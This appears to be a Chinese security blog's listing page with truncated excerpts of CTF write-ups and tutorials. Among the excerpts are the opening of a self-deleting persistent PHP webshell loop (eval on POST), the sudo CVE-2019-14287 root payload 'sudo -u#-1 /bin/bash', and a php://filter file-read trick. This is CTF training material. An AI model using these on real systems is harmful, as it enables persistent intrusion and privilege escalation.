【ctfshow】web入门-权限维持 WEB670-WEB676这几题做法都一样发现/var/www/html目录可写,既然是权限维持,那么直接传不死马 12345678910<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while (1) {$content = '<?php @eval($_POST["shell& 2021-12-09 ctfshow-web入门 #wp #ctfshow #web入门
首届安徽省“追日杯”大学生网络安全挑战赛-wp 混了个三等奖,奖状至今未发(主办方跑路了。。。) MISCcheckinflag{welcome_to_zrb@2021} 阵法的奥秘提示是8进制,观察到最后的数字是变化的 123456789PING zrb.edisec.net: 56 data bytes64 bytes from zrb.edisec.net: icmp_seq=3 ttl=51 time=97.77 ms64 bytes 2021-12-05 wp #2021 #wp - 追日杯 - 安徽
Linux sudo权限提升漏洞 CVE-2019-14287 漏洞影响1.8.28之前的sudo版本均会受到影响 漏洞复现现在的用户alice没权限看flag文件 查看sudo版本 符合利用条件,payload:sudo -u#-1 /bin/bash 2021-11-24 linux #CVE #linux提权
【ctfshow】击剑杯-wp 热身进群得码群里发送 击剑杯签到即可 听歌识曲赛后问了群友,可能真的是积累与特征吧大概有两种方法:1:听歌词百度2:直接知道什么歌答案是普京ctfshow{Vladimir_Vladimirovich_Putin} 看图识码网页是一张大的二维码,但是有四个定位符就很奇怪,根据hint,分离出四个小二维码用二维码神器cortexscan逐一扫描,然后拼接在一起,就是flag啦 看 2021-11-11 wp #wp #ctfshow
极客挑战2021-misc-wp 前言个人感觉有几题出的不是很合理,但还是有收获的 In the Air Intro && Hint: 善于观察藏在身边的 flag, 提示:无线电会在空气中传播 没啥好说的,只有校内能做,WiFI名字就是flag easysend Intro && Hint: (区块链)描述:请发送0.1Rospten测试币到0x0b896c359adf4bb1c19c7dfd4 2021-11-04 wp #wp #2021 #极客挑战
极客挑战2021-期末不挂科就算成功-wp 题目描述 你挂科咯 试试打入学校内网来修改成绩吧(我命由我不由天系列) 可以知道本题需要使用ssrf 伪协议在源代码中发现debug.php 在debug.php中发现可以使用伪协议 传入?file=php://filter/convert.base64-encode/resource=debug.php查看debug.php的源码 12345678910111213//debug.php关键源 2021-11-03 wp #wp #2021 #极客挑战 #ssrf
极客挑战2021-breakout-wp 题目代码12345678<?phphighlight_file(__FILE__);// 这些奇怪的符号是什么呢?字符串之间还能异或的吗?$a = $_POST['v'] ^ '!-__)^';// ctf常见的验证码哦!纯数字呢if (substr(md5($_POST['auth']),0,6) == "666666& 2021-11-02 wp #wp #2021 #disable_function #极客挑战
在Rospten测试链部署一个合约 基础准备首先,需要一个钱包插件MetaMask,安装过程就不多说了,百度有很多教程选择一个在线ide 部署合约首先在默认目录下新建一个文件,注意以sol为后缀名 写上你的合约代码并选择编译器版本,编译成功后如图所示会出现编译成功的标志 最后部署合约,选择“Injected Web3”,表示我们要使用MetaMask注入的Web3环境,如果已正确连接MetaMask,可以看到“Ropsten (3) 2021-10-31 区块链 #基础 #区块链 #rospten
CTF中关于md5的一些总结 MD5弱类型比较12345678910111213141516<?phphighlight_file(__FILE__);error_reporting(0);$a = $_GET['a'];$b = $_GET['b'];if (isset($_GET['a']) and isset($_GET['b']))& 2021-10-31 总结 #md5 #hash #绕过
Hackergame 2021-图之上的信息-wp 题目小 T 听说 GraphQL 是一种特别的 API 设计模式,也是 RESTful API 的有力竞争者,所以他写了个小网站来实验这项技术。你能通过这个全新的接口,获取到没有公开出来的管理员的邮箱地址吗? 资料谷歌找到的一篇文章查所有可用的字段 解题先guest/guest登陆然后在/graphql接口中查到需要的email字段 最后查询 {"query" 2021-10-30 wp #wp #2021 #GraphQL #hackergame